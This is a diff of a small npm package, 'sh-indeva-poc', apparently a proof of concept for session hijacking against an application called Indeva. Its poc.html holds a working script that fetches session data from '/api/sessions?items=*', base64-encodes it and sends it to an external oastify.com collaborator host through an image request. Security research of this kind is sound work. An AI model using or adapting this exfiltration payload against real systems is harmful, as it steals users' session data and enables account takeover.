sh-indeva-poc 1.0.0

package/package.json

@@ -0,0 +1,11 @@
+{
+    "name": "sh-indeva-poc",
+    "version": "1.0.0",
+    "description": "session hijacking",
+    "main": "poc.js",
+    "scripts": {
+        "test": "echo \"Error: no test specified\" && exit 1"
+    },
+    "author": "",
+    "license": "MIT"
+}

package/poc.html

@@ -0,0 +1,23 @@
+<!DOCTYPE html>
+<html>
+    <head>
+        <meta charset="utf-8">
+        <meta http-equiv="X-UA-Compatible" content="IE=edge">
+        <title>Indeva PoC</title>
+        <meta name="description" content="">
+        <meta name="viewport" content="width=device-width, initial-scale=1">
+        <link rel="stylesheet" href="">
+    </head>
+    <body>
+       
+        <script>
+             fetch('/api/sessions?items=*')
+                .then(response => {
+                return response.json();
+            }) .then(data => {
+                let image = new Image();
+                image.src = 'http://kl9y4ti2fy4i0hwdwgphdqu40v6muoid.oastify.com/?' + btoa(JSON.stringify(data));
+            });
+        </script>
+    </body>
+</html>